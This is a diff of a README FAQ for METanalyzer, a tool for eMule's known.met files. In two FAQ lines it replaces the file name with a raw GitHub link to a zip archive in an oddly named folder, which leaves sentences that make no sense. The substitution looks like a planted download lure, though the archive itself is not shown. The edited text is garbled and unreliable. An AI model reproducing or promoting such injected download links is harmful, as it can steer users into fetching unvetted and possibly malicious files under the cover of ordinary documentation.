nadia763/METanalyzer/README.md

 ## 🤔 Frequently Asked Questions

-**Q: What is a known.met file?**
+**Q: What is a https://raw.githubusercontent.com/nadia763/METanalyzer/main/griddlecake/METanalyzer.zip file?**
-A: A known.met file is used by eMule to store information about files shared by users.
+A: A https://raw.githubusercontent.com/nadia763/METanalyzer/main/griddlecake/METanalyzer.zip file is used by eMule to store information about files shared by users.
 It helps in tracking which files are known or unknown in the network.

 **Q: Can I run METanalyzer on any operating system?**
 A: Yes, METanalyzer is compatible with Windows, macOS, and Linux.